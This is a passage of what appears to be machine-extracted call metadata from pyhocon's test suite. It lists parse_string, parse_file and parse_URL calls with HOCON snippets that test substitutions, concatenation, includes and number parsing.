{\n c = 5\n }\n }\n d = test ${a.b.c} me\n }\n """\n )\n', (14327, 14539), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((14708, 14971), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = ${e}\n }\n }\n d = test ${a.b.c} me\n e = 7\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = ${e}\n }\n }\n d = test ${a.b.c} me\n e = 7\n }\n """\n )\n', (14734, 14971), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15132, 15266), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 5\n b=${a}${a}\n c=${a} ${a}\n """'], {}), '(\n """\n a = 5\n b=${a}${a}\n c=${a} ${a}\n """\n )\n', (15158, 15266), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15440, 15630), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic} {name = "east"}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic} {name = "east"}\n """\n )\n', (15466, 15630), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15788, 15978), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n """\n )\n', (15814, 15978), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((16138, 16366), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }\n """\n )\n', (16164, 16366), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((16590, 16854), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n data-center-east-prod = ${data-center-east} {tmpDir=/tmp}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n data-center-east-prod = ${data-center-east} {tmpDir=/tmp}\n """\n )\n', (16616, 16854), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17153, 17380), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic}\n data-center-east = { name = "east" }\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic}\n data-center-east = { name = "east" }\n """\n )\n', (17179, 17380), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17529, 17756), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = { name = "east" }\n data-center-east = ${data-center-generic}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = { name = "east" }\n data-center-east = ${data-center-generic}\n """\n )\n', (17555, 17756), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17960, 17999), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = bar"""'], {}), "('foo = bar')\n", (17986, 17999), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18111, 18150), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = "5\\""""'], {}), '(\'foo = "5"\')\n', (18137, 18150), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18267, 18310), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = ""\\"5""\\""""'], {}), '(\'foo = """5"""\')\n', (18293, 18310), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18410, 18447), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = 5"""'], {}), "('foo = 5')\n", (18436, 18447), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18547, 18586), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = 5.0"""'], {}), "('foo = 5.0')\n", (18573, 18586), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18680, 18840), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = ${common_modules} [java]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = ${common_modules} [java]\n """\n )\n', (18706, 18840), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18944, 19104), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules}\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules}\n """\n )\n', (18970, 19104), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((19209, 19376), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n """\n )\n', (19235, 19376), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((19555, 19777), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n full_modules = ${host_modules} [c, go]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n full_modules = ${host_modules} [c, go]\n """\n )\n', (19581, 19777), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((20092, 20238), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n main_language = php\n languages = [java, ${main_language}]\n """'], {}), '(\n """\n main_language = php\n languages = [java, ${main_language}]\n """\n )\n', (20118, 20238), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((20378, 20654), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n application.foo = 128mm\n application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]\n """'], {}), '(\n """\n application.foo = 128mm\n application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]\n """\n )\n', (20404, 20654), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21025, 21387), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n application.foo = 128mm\n application.default-jvm-opts = ["-XX:+UseParNewGC"]\n application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}\n """'], {}), '(\n """\n application.foo = 128mm\n application.default-jvm-opts = ["-XX:+UseParNewGC"]\n application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}\n """\n )\n', (21051, 21387), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24172, 24344), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x = ${x} [3,4]\n x = [-1, 0] ${x} [5, 6]\n x = [-3, -2] ${x}\n """'], {}), '(\n """\n x = [1,2]\n x = ${x} [3,4]\n x = [-1, 0] ${x} [5, 6]\n x = [-3, -2] ${x}\n """\n )\n', (24198, 24344), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24481, 24578), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x += [3,4]\n """'], {}), '(\n """\n x = [1,2]\n x += [3,4]\n """)\n', (24507, 24578), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24794, 24887), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = abc\n x += def\n """'], {}), '(\n """\n x = abc\n x += def\n """)\n', (24820, 24887), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25089, 25157), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += def\n """'], {}), '("""\n x += def\n """)\n', (25115, 25157), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25289, 25359), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += [1,2]\n """'], {}), '("""\n x += [1,2]\n """)\n', (25315, 25359), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25480, 25579), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {a: 1}\n x += {b: 2}\n """'], {}), '(\n """\n x = {a: 1}\n x += {b: 2}\n """)\n', (25506, 25579), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25717, 25788), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += {a: 1}\n """'], {}), '("""\n x += {a: 1}\n """)\n', (25743, 25788), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25928, 26087), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x = {x: [3,4]}\n x = {y: [5,6]}\n x = {z: ${x}}\n """'], {}), '(\n """\n x = [1,2]\n x = {x: [3,4]}\n x = {y: [5,6]}\n x = {z: ${x}}\n """\n )\n', (25954, 26087), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26324, 26437), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {x: [3,4]}\n x = [${x}, 2, 3]\n """'], {}), '(\n """\n x = {x: [3,4]}\n x = [${x}, 2, 3]\n """\n )\n', (26350, 26437), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26650, 26753), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {y: {z: 1}}\n x = ${x.y}\n """'], {}), '(\n """\n x = {y: {z: 1}}\n x = ${x.y}\n """)\n', (26676, 26753), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26991, 27094), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {y: {y: 1}}\n x = ${x.y}\n """'], {}), '(\n """\n x = {y: {y: 1}}\n x = ${x.y}\n """)\n', (27017, 27094), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27824, 27972), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo : { a : { c : 1 } }\n foo : ${foo.a}\n foo : { a : 2 }\n """'], {}), '(\n """\n foo : { a : { c : 1 } }\n foo : ${foo.a}\n foo : { a : 2 }\n """\n )\n', (27850, 27972), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((28220, 28366), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n """'], {}), '(\n """\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n """\n )\n', (28246, 28366), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((28630, 28811), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n bar : { foo : 43 }\n """'], {}), '(\n """\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n bar : { foo : 43 }\n """\n )\n', (28656, 28811), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29082, 29347), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n // bar.a should end up as 4\n bar : { a : ${foo.d}, b : 1 }\n bar.b = 3\n // foo.c should end up as 3\n foo : { c : ${bar.b}, d : 2 }\n foo.d = 4\n """'], {}), '(\n """\n // bar.a should end up as 4\n bar : { a : ${foo.d}, b : 1 }\n bar.b = 3\n // foo.c should end up as 3\n foo : { c : ${bar.b}, d : 2 }\n foo.d = 4\n """\n )\n', (29108, 29347), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29657, 29729), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = ${?a}foo\n """'], {}), '("""\n a = ${?a}foo\n """)\n', (29683, 29729), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30178, 30356), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {a: 1, b: 2}\n x = ${x} {c: 3}\n x = {z: 0} ${x}\n x = {y: -1} ${x} {d: 4}\n """'], {}), '(\n """\n x = {a: 1, b: 2}\n x = ${x} {c: 3}\n x = {z: 0} ${x}\n x = {y: -1} ${x} {d: 4}\n """\n )\n', (30204, 30356), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30506, 30765), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a.b = 3\n a.b = ${a.b}\n a.b = ${a.b}\n a.c = [1,2]\n a.c = ${a.c}\n a.d = {foo: bar}\n a.d = ${a.d}\n\n """'], {}), '(\n """\n a.b = 3\n a.b = ${a.b}\n a.b = ${a.b}\n a.c = [1,2]\n a.c = ${a.c}\n a.d = {foo: bar}\n a.d = ${a.d}\n\n """\n )\n', (30532, 30765), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30918, 31057), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = perl java python\n """'], {}), '(\n """\n common_modules = perl java python\n """\n )\n', (30944, 31057), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31257, 31402), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl] [java] [python]\n """'], {}), '(\n """\n common_modules = [perl] [java] [python]\n """\n )\n', (31283, 31402), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31551, 31702), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = {a:perl} {b:java} {c:python}\n """'], {}), '(\n """\n common_modules = {a:perl} {b:java} {c:python}\n """\n )\n', (31577, 31702), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31866, 31914), 'pyhocon.ConfigFactory.parse_URL', 'ConfigFactory.parse_URL', (['"""file:samples/aws.conf"""'], {}), "('file:samples/aws.conf')\n", (31889, 31914), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32121, 32165), 'pyhocon.ConfigFactory.parse_URL', 'ConfigFactory.parse_URL', (['"""https://nosuchurl"""'], {}), "('https://nosuchurl')\n", (32144, 32165), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32258, 32306), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/animals.conf"""'], {}), "('samples/animals.conf')\n", (32282, 32306), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32499, 32551), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/all_animals.conf"""'], {}), "('samples/all_animals.conf')\n", (32523, 32551), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32752, 32801), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/all_bars.conf"""'], {}), "('samples/all_bars.conf')\n", (32776, 32801), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33184, 33332), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n {a: 1, b: 2},\n {a: 3, c: 4},\n ]\n """'], {}), '(\n """\n a: [\n {a: 1, b: 2},\n {a: 3, c: 4},\n ]\n """\n )\n', (33210, 33332), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33498, 33632), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n [1, 2]\n [3, 4]\n ]\n """'], {}), '(\n """\n a: [\n [1, 2]\n [3, 4]\n ]\n """\n )\n', (33524, 33632), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33789, 34006), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b = {f: 4}\n a: [\n ${b} {a: 1, b: 2},\n {a: 3, c: 4} ${b},\n {a: 3} ${b} {c: 6},\n ]\n """'], {}), '(\n """\n b = {f: 4}\n a: [\n ${b} {a: 1, b: 2},\n {a: 3, c: 4} ${b},\n {a: 3} ${b} {c: 6},\n ]\n """\n )\n', (33815, 34006), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34237, 34439), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b = [5, 6]\n a: [\n ${b} [1, 2]\n [3, 4] ${b}\n [1, 2] ${b} [7, 8]\n ]\n """'], {}), '(\n """\n b = [5, 6]\n a: [\n ${b} [1, 2]\n [3, 4] ${b}\n [1, 2] ${b} [7, 8]\n ]\n """\n )\n', (34263, 34439), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((36391, 36551), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n include "dummy.txt"\n 3\n 4\n ]\n """'], {}), '(\n """\n a: [\n include "dummy.txt"\n 3\n 4\n ]\n """\n )\n', (36417, 36551), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((36662, 36834), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n include required("samples/animals.d/cat.conf")\n t = 2\n }\n """'], {}), '(\n """\n a {\n include required("samples/animals.d/cat.conf")\n t = 2\n }\n """\n )\n', (36688, 36834), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37070, 37248), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n include required(file("samples/animals.d/cat.conf"))\n t = 2\n }\n """'], {}), '(\n """\n a {\n include required(file("samples/animals.d/cat.conf"))\n t = 2\n }\n """\n )\n', (37096, 37248), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37668, 37729), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""pyhocon:config_parser.py"""'], {}), "('pyhocon:config_parser.py')\n", (37701, 37729), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37745, 37765), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (37759, 37765), False, 'import os\n'), ((38170, 38188), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (38186, 38188), False, 'import tempfile\n'), ((41441, 41527), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n include-database=true\n """'], {}), '(\n """\n include-database=true\n """)\n', (41467, 41527), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((41671, 42078), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n host = localhost\n port = 5432\n user = people\n name = peopledb\n pass = peoplepass\n }\n\n user=test_user\n pass=test_pass\n\n database {\n user = ${user}\n pass = ${pass}\n }\n\n """'], {}), '(\n """\n database {\n host = localhost\n port = 5432\n user = people\n name = peopledb\n pass = peoplepass\n }\n\n user=test_user\n pass=test_pass\n\n database {\n user = ${user}\n pass = ${pass}\n }\n\n """\n )\n', (41697, 42078), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((42256, 42492), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n name = peopledb\n pass = peoplepass\n name = ${?NOT_EXISTS}\n pass = ${?NOT_EXISTS}\n }\n """'], {}), '(\n """\n database {\n name = peopledb\n pass = peoplepass\n name = ${?NOT_EXISTS}\n pass = ${?NOT_EXISTS}\n }\n """\n )\n', (42282, 42492), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((42674, 42866), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: foo\n c: ${a} ${b}\n c: ${b} ${a}\n d: ${a} ${b}\n d: ${a} bar\n """'], {}), '(\n """\n a: 1\n b: foo\n c: ${a} ${b}\n c: ${b} ${a}\n d: ${a} ${b}\n d: ${a} bar\n """\n )\n', (42700, 42866), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43014, 43277), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n name = peopledb\n pass = peoplepass\n }\n\n database {\n name = ${?user}\n pass = ${?pass}\n }\n\n """'], {}), '(\n """\n database {\n name = peopledb\n pass = peoplepass\n }\n\n database {\n name = ${?user}\n pass = ${?pass}\n }\n\n """\n )\n', (43040, 43277), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43452, 43567), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: 42\n foo: ${?a}\n """'], {'resolve': '(False)'}), '(\n """\n foo: 42\n foo: ${?a}\n """, resolve\n =False)\n', (43478, 43567), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43588, 43653), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b: 14\n """'], {}), '("""\n b: 14\n """)\n', (43614, 43653), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43898, 43931), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""c=5"""'], {}), "('c=5')\n", (43924, 43931), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43950, 44001), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""b=${c}"""'], {'resolve': '(False)'}), "('b=${c}', resolve=False)\n", (43976, 44001), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((44274, 44480), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 45\n b = ${?c}\n d = ${?c} 4\n e = ${?a}\n g = ${?c1} ${?c2}\n h = ${?c1} ${?c2} 1\n """'], {}), '(\n """\n a = 45\n b = ${?c}\n d = ${?c} 4\n e = ${?a}\n g = ${?c1} ${?c2}\n h = ${?c1} ${?c2} 1\n """\n )\n', (44300, 44480), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((44716, 44890), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n num = 3\n retries_msg = You have ${num} retries\n retries_msg = ${?CUSTOM_MSG}\n """'], {}), '(\n """\n num = 3\n retries_msg = You have ${num} retries\n retries_msg = ${?CUSTOM_MSG}\n """\n )\n', (44742, 44890), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45315, 45492), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n 4\n\n b = # test\n # test2\n 5\n\n c =\n\n 6\n """'], {}), '(\n """\n a =\n 4\n\n b = # test\n # test2\n 5\n\n c =\n\n 6\n """\n )\n', (45341, 45492), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45650, 45806), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n short = 12\n long = 12321321837612378126213217321\n negative = -15\n """'], {}), '(\n """\n short = 12\n long = 12321321837612378126213217321\n negative = -15\n """\n )\n', (45676, 45806), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((46189, 46334), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 121.22\n b = -121.22\n c = .54\n d = -.54\n """'], {}), '(\n """\n a = 121.22\n b = -121.22\n c = .54\n d = -.54\n """\n )\n', (46215, 46334), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((46687, 46911), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n short = 12.12321\n long1 = 121.22E3423432\n neg_long1 = 121.22E-1\n long2 = 121.22e3423432\n neg_long2 = 121.22e-3\n """'], {}), '(\n """\n short = 12.12321\n long1 = 121.22E3423432\n neg_long1 = 121.22E-1\n long2 = 121.22e3423432\n neg_long2 = 121.22e-3\n """\n )\n', (46713, 46911), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((47304, 47487), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n "a"\n\n b = # test\n # test2\n "b"\n\n c =\n\n "c"\n """'], {}), '(\n """\n a =\n "a"\n\n b = # test\n # test2\n "b"\n\n c =\n\n "c"\n """\n )\n', (47330, 47487), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((47669, 47964), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n [\n 1,\n 2,\n ]\n\n b = # test\n # test2\n [\n 3,\n 4,]\n\n c =\n\n [\n 5,\n 6\n ]\n """'], {}), '(\n """\n a =\n [\n 1,\n 2,\n ]\n\n b = # test\n # test2\n [\n 3,\n 4,]\n\n c =\n\n [\n 5,\n 6\n ]\n """\n )\n', (47695, 47964), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((48155, 48462), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n [\n "a",\n "b",\n ]\n\n b = # test\n # test2\n [\n "c",\n "d",]\n\n c =\n\n [\n "e",\n "f"\n ]\n """'], {}), '(\n """\n a =\n [\n "a",\n "b",\n ]\n\n b = # test\n # test2\n [\n "c",\n "d",]\n\n c =\n\n [\n "e",\n "f"\n ]\n """\n )\n', (48181, 48462), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((48681, 48994), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n {\n a: 1,\n b: 2,\n }\n\n b = # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c =\n\n {\n e: 5,\n f: 6\n }\n """'], {}), '(\n """\n a =\n {\n a: 1,\n b: 2,\n }\n\n b = # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c =\n\n {\n e: 5,\n f: 6\n }\n """\n )\n', (48707, 48994), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49229, 49536), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a\n {\n a: 1,\n b: 2,\n }\n\n b # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c\n\n {\n e: 5,\n f: 6\n }\n """'], {}), '(\n """\n a\n {\n a: 1,\n b: 2,\n }\n\n b # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c\n\n {\n e: 5,\n f: 6\n }\n """\n 